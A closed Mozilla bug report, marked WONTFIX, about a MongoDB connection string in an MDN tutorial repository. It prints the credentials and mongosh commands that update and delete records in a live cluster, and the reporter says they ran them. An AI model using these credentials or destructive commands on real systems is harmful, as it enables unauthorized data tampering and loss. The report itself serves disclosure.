Closed Bug 1960816 Opened 1 month ago Closed 23 days ago

Exposed MongoDB Credentials Allow Unauthenticated Access with Read/Write/Delete Privileges

Categories: Firefox :: about:logins, defect

Status: RESOLVED WONTFIX

People: Reporter ammu424656, Unassigned

Attachments (1 file): attached image mozilla1.png

Description: A publicly exposed MongoDB connection string allows full access to the database without authentication. Anyone can connect to the production database and:

  • Read sensitive collections (books, authors, pets, etc.).
  • Modify documents (updateOne successful).
  • Delete records (deleteOne successful).
  • Potentially perform privilege escalation if users or roles are stored.

The credentials (cooluser:coolpassword) work for a live cluster.

Severity: CRITICAL

Vulnerable URL: https://github.com/mdn/express-locallibrary-tutorial/blob/4a9ef48a9a37f8d067c3101c47456977b4a04b93/populatedb.js

Steps to Reproduce:

  1. Navigate to the Vulnerable URL.
  2. You will find the MongoDB connection string.
  3. Using mongosh, connect to the MongoDB shell:

mongosh "mongodb+srv://cooluser:coolpassword@cluster0.cojoign.mongodb.net/local_library?retryWrites=true&w=majority&appName=Cluster0"

  4. Run the following commands:
  • To update a document in the books collection, use a title that exists in the collection:

db.books.updateOne({ title: "The Name of the Wind (The Kingkiller Chronicle, #1)" }, { $set: { title: "Modified Book" } });

  • To delete a document, use an existing title:

db.books.deleteOne({ title: "Modified Book" });

  5. Confirm the data after the modifications; this reflects the changes I made:

db.books.find().limit(5);

  6. I have successfully gained unauthorized read, write, and delete access to the production database.

Impact:

  • Full unauthorized access to the production database.
  • Potential business and data loss.
  • PII exposure if collections store user data.
  • High severity due to lack of auth, write/delete capabilities, and public availability of credentials.

Mitigation:

  • Rotate the username/password for cooluser on MongoDB Atlas.
  • Disable or delete the cooluser user if not needed.
  • Rotate credentials and purge commit history using BFG Repo-Cleaner or git filter-branch.

POC: I'm attaching the screenshots for your perusal; please take a look at them.

Status: UNCONFIRMED → RESOLVED
Closed: 23 days ago
Resolution: --- → WONTFIX